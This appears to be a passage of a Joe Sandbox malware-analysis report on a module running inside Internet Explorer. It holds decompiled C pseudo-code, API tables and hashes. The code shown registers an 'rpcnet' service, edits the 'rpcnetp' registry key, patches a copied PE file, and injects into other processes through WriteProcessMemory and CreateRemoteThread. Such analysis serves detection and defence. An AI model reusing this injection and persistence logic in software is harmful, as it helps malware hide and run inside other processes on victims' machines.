						if(_t48 != 0xffffffff) {
							_t28 =  *0x72b260c4; // 0x72b20000
							_t12 = _t28 + 0x3c; // 0x48
							_t40 =  *_t12 + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0);
							WriteFile(_t48,  &_a8, 2,  &_a4, 0);
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}















0x72b2285d
0x72b22865
0x72b22942
0x72b22942
0x72b2286f
0x72b22876
0x72b22878
0x72b22878
0x72b22888
0x72b22893
0x72b22896
0x72b2289f
0x72b2289f
0x72b228a4
0x72b228ac
0x72b228b6
0x72b228c3
0x72b228cb
0x72b228da
0x72b228e0
0x72b228e5
0x72b228e7
0x72b228ec
0x72b228ef
0x72b228f5
0x72b228f8
0x72b228fe
0x72b22914
0x72b22900
0x72b22905
0x72b22905
0x72b2291b
0x72b2291f
0x72b22931
0x72b22938
0x72b22938
0x72b228e5
0x72b228cb
0x00000000

APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 72B2285D
  • lstrcpyA.KERNEL32(?,?), ref: 72B22893
  • lstrlenA.KERNEL32(?), ref: 72B22896
  • lstrcmpiA.KERNEL32(-00000003,72B212DC), ref: 72B228A4
  • lstrcpyA.KERNEL32(-00000003,72B212DC), ref: 72B228B6
  • CopyFileA.KERNEL32 ref: 72B228C3
  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 72B228DA
  • SetFilePointer.KERNEL32(00000000,00000032,00000000,00000000), ref: 72B2291F
  • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 72B22931
  • CloseHandle.KERNEL32(00000000), ref: 72B22938
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 3010676052-2048111982
  • Opcode ID: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction ID: 39e45ebfadebca685611a7423d435aa536271cb13803ea72af992d0feb52d8ed
  • Opcode Fuzzy Hash: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction Fuzzy Hash: C331B636500218BBDB209F56CD48FEB3BFCEF85795F118469FA4AE7142E6308545CB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;
				void* _t36;

				_t32 = 0;
				_t36 =  *0x72b26038 - _t32; // 0x1
				if(_t36 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}










0x72b2259f
0x72b225a1
0x72b225a7
0x72b225cc
0x72b225cf
0x72b225d5
0x72b225dd
0x72b225df
0x72b225df
0x72b225f5
0x00000000
0x00000000
0x72b225fa
0x72b2260c
0x72b22615
0x72b2261d
0x72b22625
0x72b22625
0x72b22638
0x72b2264d
0x72b22652
0x00000000
0x72b22652
0x72b22640
0x72b22642
0x72b22650
0x00000000
0x72b22650
0x72b22644
0x72b22644
0x72b225cf
0x72b225af
0x72b225bd
0x00000000

APIs
  • GetSystemDirectoryA.KERNEL32 ref: 72B225AF
  • lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe), ref: 72B225D5
  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 72B225ED
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 72B2260C
  • RegCloseKey.ADVAPI32(?), ref: 72B22615
  • lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 72B22625
  • GetBinaryTypeA.KERNEL32(?,?), ref: 72B22630
Strings
  • \Internet Explorer\iexplore.exe, xrefs: 72B2261F
  • ProgramFilesDir, xrefs: 72B22644
  • \svchost.exe, xrefs: 72B225B5
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 72B225CF
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
  • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
  • API String ID: 2611574897-1971102070
  • Opcode ID: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction ID: aa450610dbcd0adc5716e67513ca5fe787850a5d435588086c1ad627bace7870
  • Opcode Fuzzy Hash: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction Fuzzy Hash: 2C218E37560344BBDB129E69CC08BDB7BFDEF84286F214529F94AE6006E7308A51CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 72B2495C
  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 72B2497A
  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 72B24987
  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 72B24994
  • FreeLibrary.KERNEL32(?), ref: 72B249D8
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: AddressProc$Library$FreeLoad
  • String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
  • API String ID: 2449869053-171673395
  • Opcode ID: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction ID: da1224439bb4948f671e8665be7783c961a7690319e1cb8d5b89657dbbdfc4a5
  • Opcode Fuzzy Hash: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction Fuzzy Hash: 97415072900209AFDF12CF55CC84BDA7FB9EF85351F1481AABE09AF145D770A645CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B22658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0x72b260a4 = CreateEventA(0, 1, 0, 0);
				 *0x72b26010 = 0x10;
				 *0x72b2601c = 0x42a;
				 *0x72b26020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E72B21EEB);
				 *0x72b260bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0x72b26018 = 1;
					E72B22266();
					 *0x72b26018 = 5;
					E72B22266(4, 0, 0);
					E72B22296();
					 *0x72b2601c = 0;
					 *0x72b26020 = 0;
					_t11 = CreateThread(0, 0, E72B23161, 0, 0,  &_v12);
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0x72b260a4, 0xffffffff);
						_t13 =  *0x72b2600c; // 0x1004c
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0x72b26020 = _t24;
					}
					CloseHandle( *0x72b260a4);
					_t6 = E72B22266(1, 0, 0);
				}
				return _t6;
			}









0x72b22678
0x72b2267d
0x72b22687
0x72b22691
0x72b22697
0x72b2269d
0x72b226a4
0x72b226ab
0x72b226ac
0x72b226b3
0x72b226b4
0x72b226b5
0x72b226bb
0x72b226c4
0x72b226ce
0x72b226d3
0x72b226e5
0x72b226eb
0x72b226f1
0x72b226f7
0x72b226fc
0x72b22714
0x72b22716
0x72b2271d
0x72b22724
0x72b22724
0x72b22732
0x72b22737
0x72b226fe
0x72b226fe
0x72b226fe
0x72b22743
0x72b2274c
0x72b22751
0x72b22755

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B22668
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,72B21EEB), ref: 72B22697
    • Part of subcall function 72B22266: SetServiceStatus.ADVAPI32(72B26010,?,72B226C0,00000002,00001388,00000000), ref: 72B2228C
    • Part of subcall function 72B22296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
    • Part of subcall function 72B22296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
    • Part of subcall function 72B22296: RegEnumValueA.ADVAPI32 ref: 72B22300
    • Part of subcall function 72B22296: RegCloseKey.ADVAPI32(?), ref: 72B22309
  • CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B226F1
  • WaitForSingleObject.KERNEL32(000000FF), ref: 72B22714
  • PostMessageA.USER32 ref: 72B22724
  • WaitForSingleObject.KERNEL32(?,00007530), ref: 72B22732
  • CloseHandle.KERNEL32(?), ref: 72B22737
  • CloseHandle.KERNEL32 ref: 72B22743
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
  • String ID: rpcnet
  • API String ID: 2965456292-717388198
  • Opcode ID: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction ID: 02e831f8f98af63f743597e7f97a2177f381f5a52501a144112e9f4fabe84738
  • Opcode Fuzzy Hash: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction Fuzzy Hash: 87216BB2591364BBD7315B5B8C88F9B3EE8FB497E2B22091DF209D7142C3740900EBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B216BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}











0x72b216be
0x72b216c1
0x72b216c9
0x72b216d2
0x72b216d8
0x72b216e0
0x72b216e3
0x72b216e9
0x72b216f7
0x72b216fa
0x72b216fa
0x72b216fc
0x72b21704
0x72b21707
0x72b21707
0x72b21709
0x72b21717
0x72b2171f
0x72b2172b
0x72b2172d
0x72b2172d
0x72b21734
0x72b2173c
0x72b2173f
0x72b2173f
0x72b21741
0x72b21749
0x72b2174c
0x72b2174c
0x72b21751
0x00000000
0x72b21758
0x72b2175b

APIs
  • EnterCriticalSection.KERNEL32(?,00000000,00000080,?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000), ref: 72B216E3
  • SetEvent.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B216FA
  • SetEvent.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B21707
  • WaitForSingleObject.KERNEL32(?,000007D0,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2171F
  • CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2172B
  • CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2173F
  • CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2174C
  • DeleteCriticalSection.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B21751
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
  • String ID:
  • API String ID: 2299618653-0
  • Opcode ID: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction ID: 2178e58ac556364a2b17c8ba54c2abf152cba4207c59054d382db62ef48bba22
  • Opcode Fuzzy Hash: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction Fuzzy Hash: 04113075610744ABCB21AE7ACD84BC7BBFCEF84795B115819E95EE3212E734E8008A64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12);
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0x72b260c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}








0x72b222aa
0x72b222b1
0x72b222b9
0x72b222cf
0x72b222dd
0x72b222ed
0x72b222fd
0x72b22304
0x00000000
0x00000000
0x72b222e7
0x72b222e7
0x00000000
0x72b22311
0x72b22313

APIs
  • RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
  • RegDeleteValueA.ADVAPI32(?,?), ref: 72B222E7
  • RegEnumValueA.ADVAPI32 ref: 72B22300
  • RegCloseKey.ADVAPI32(?), ref: 72B22309
Strings
  • System\CurrentControlSet\Services\rpcnetp, xrefs: 72B222A0
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Value$CloseDeleteEnumOpenQuery
  • String ID: System\CurrentControlSet\Services\rpcnetp
  • API String ID: 1768883651-3077676073
  • Opcode ID: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction ID: a7eab7136433f130f13a6380ef9fab967bd967ebe69315b92658c948a71fe067
  • Opcode Fuzzy Hash: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction Fuzzy Hash: 9E010C76901218BBDB219A96CD48EDF7FBCEF452A1F101065FA05F2002D7319A45EBB4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B21C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x72b25398);
				E72B24A94(_t40, _t44, _t46);
				 *(_t48 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t45 = GetStdHandle(0xfffffff4);
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				if( *(_t48 - 0x1c) != 0) {
					_push(_t48 - 0x20);
					_t41 = 4;
					_t47 =  *(_t48 + 8);
					if(WriteProcessMemory(_t45, _t47 + 0x84, _t48 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t45, _t47,  *(_t48 - 0x1c), 0x78, _t48 - 0x20) != 0) {
						 *( *(_t48 - 0x1c) + 0x6c) = _t41;
						 *( *(_t48 - 0x1c) + 0x70) =  *( *(_t48 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t48 - 0x1c) + 0x370c) =  *( *(_t48 - 0x1c) + 0x370c) | _t41;
						 *( *(_t48 - 0x1c) + 0x1bd4) = _t47;
						E72B21F95(_t41, _t42, _t43, _t45, _t47,  *( *(_t48 - 0x1c) + 0x370c),  *(_t48 - 0x1c));
					}
					LocalFree( *(_t48 - 0x1c));
				}
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				ExitThread(0);
			}












0x72b21c7b
0x72b21c7d
0x72b21c82
0x72b21c94
0x72b21c9f
0x72b21ca1
0x72b21ca9
0x72b21cae
0x72b21cb1
0x72b21cb7
0x72b21cca
0x72b21ce4
0x72b21cea
0x72b21cf1
0x72b21cfa
0x72b21d03
0x72b21d03
0x72b21d0b
0x72b21d0b
0x72b21d1a
0x72b21d20

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,72B25398,00000010), ref: 72B21C8E
  • GetStdHandle.KERNEL32(000000F4), ref: 72B21C99
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 72B21CC2
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 72B21CD7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
    • Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
    • Part of subcall function 72B21F95: ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
    • Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
    • Part of subcall function 72B21F95: CloseHandle.KERNEL32(00000000), ref: 72B220D9
  • LocalFree.KERNEL32(00000000), ref: 72B21D0B
  • ExitThread.KERNEL32 ref: 72B21D20
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
  • String ID:
  • API String ID: 3187294079-0
  • Opcode ID: 0d373e486fbd5fa3d520274f4ca0a1fec86b10583ae1df6bb5ea309636de2055
  • Instruction ID: c86dc8486e0665793866c7a9820250b529532658d765509b66e6b22a8b28303e
  • Opcode Fuzzy Hash: 0d373e486fbd5fa3d520274f4ca0a1fec86b10583ae1df6bb5ea309636de2055
  • Instruction Fuzzy Hash: 52113A7295034AEFDB118FA5CC48FEE7BF8EB44361F158229E529B7192D7389501CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 38%
			E72B224BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0;
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}









0x72b224c2
0x72b224c7
0x72b224d1
0x72b224d7
0x72b224df
0x72b224e1
0x72b224e7
0x72b224ec
0x72b2252f
0x72b224ee
0x72b224f1
0x72b224fb
0x72b22500
0x72b22501
0x72b22504
0x72b2250a
0x72b22506
0x72b22506
0x72b22506
0x72b22514
0x72b2251a
0x72b2251a
0x72b224f3
0x72b224f3
0x72b224f3
0x72b22523
0x72b22523
0x72b22539

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 72B224E1
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 72B2250C
  • GetExitCodeThread.KERNEL32(?,?), ref: 72B2251A
  • CloseHandle.KERNEL32(?), ref: 72B22523
  • TerminateProcess.KERNEL32(?,00000000), ref: 72B2252F
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
  • String ID:
  • API String ID: 1317926807-0
  • Opcode ID: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction ID: 43fb7a0f769fbdbb6116ecc8b05a183b5ca6aff15e3d6e9499a38349c8af174b
  • Opcode Fuzzy Hash: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction Fuzzy Hash: E6113971401228BFCB225F56CC58ECF7FB9EF497A2F118505F50AA6152D3309651CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%
			E72B229E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				void* _t66;

				_t61 = __edx;
				_push(0x40);
				_push(0x72b253e8);
				E72B24A94(__ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t66 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				_t63 = 0;
				 *(_t66 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t66 - 0x24);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t66 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t66 + 0x10)) - _t63;
					if(_t53 >  *((intOrPtr*)(_t66 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t66 - 0x24));
					}
					_push(_t66 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t66 + 0xc)) + _t63);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t66 - 0x1c)) != _t58) {
						_t63 = _t63 +  *((intOrPtr*)(_t66 - 0x1c));
						 *((intOrPtr*)(_t66 - 0x28)) = _t63;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t63;
				if(_t63 != _t58) {
					lstrcpyA(_t66 - 0x50, "TagId");
					 *((intOrPtr*)(_t66 - 0x1c)) = 0x28;
					_push(0);
					_push(_t66 - 0x1c);
					_push(_t66 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c88))() != 0) {
						lstrcpyA(_t65 + 0x3cb0, _t66 - 0x50);
					}
					 *((intOrPtr*)(_t66 - 0x20)) = E72B22F96( *((intOrPtr*)(_t66 + 0xc)), _t63);
					_t58 = 0;
				}
				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t66 - 0x20)) == _t58) {
					 *(_t65 + 0x5c) =  *(_t65 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t58;
				}
				return E72B2159C( *((intOrPtr*)(_t66 - 0x20)), _t61);
			}









0x72b229e4
0x72b229e4
0x72b229e6
0x72b229eb
0x72b229f0
0x72b229f3
0x72b229f5
0x72b229f8
0x72b229fa
0x72b229fd
0x72b229fd
0x72b229fe
0x72b22a02
0x72b22a03
0x72b22a11
0x00000000
0x00000000
0x72b22a1b
0x72b22a20
0x72b22a22
0x72b22a22
0x72b22a28
0x72b22a29
0x72b22a2f
0x72b22a30
0x72b22a3e
0x72b22a45
0x72b22a48
0x00000000
0x72b22a48
0x00000000
0x72b22a3e
0x72b22a50
0x72b22a54
0x72b22a65
0x72b22a67
0x72b22a6e
0x72b22a73
0x72b22a77
0x72b22a78
0x72b22a7d
0x72b22a8b
0x72b22a98
0x72b22a98
0x72b22aa3
0x72b22aa6
0x72b22aa6
0x72b22aa8
0x72b22ac5
0x72b22ac7
0x72b22ace
0x72b22ace
0x72b22ad8

APIs
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
